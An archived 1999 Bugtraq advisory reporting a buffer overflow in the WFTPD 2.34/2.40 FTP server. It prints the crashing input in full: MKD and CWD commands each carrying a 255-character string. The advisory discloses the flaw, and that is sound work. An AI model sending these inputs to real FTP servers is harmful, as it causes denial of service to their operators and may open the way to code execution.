Computer Security

Archive : 1999 : october : wftpd
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku





WFTPD v2.40 FTPServer remotely exploitable buffer overflow vulnerability




WFTPD v2.40 FTPServer remotely exploitable buffer overflow vulnerability






=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


    Date: Чт, 28 окт 1999  13:07:55

   От: Luciano Martins <luck@USSRBACK.COM>

 Кому: BUGTRAQ@SECURITYFOCUS.COM

 Тема: WFTPD v2.40 FTPServer remotely exploitable buffer overflow vulnerability

--------------------------------------------------------------------------------




We found in the WFTPD v2.34,v2.40 Server and earlier a vulnerable to

remotely exploitable buffer overflow. This can result in a denial of service

and at worst in arbitrary code being executed on the system.



The vulnerabilities are the conjunction of two large commands the MKD and

CWD  if they are passed an argument a string exact of  255 characters, If

this 2 large commands are passed in order program crash.

Tested in: Windows 98 / Windows Nt



Example:



First command



MKD

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

aaaaaaaaaaaaaaaaaaaaaaaaaaa



Second command



CWD

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

aaaaaaaaaaaaaaaaaaaaaaaaaaa



Crash.....Overflow.





Luck Martins



u n d e r g r o u n d  s e c u r i t y  s y s t e m s  r e s e a r c h

WWW.USSRBACK.COM
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru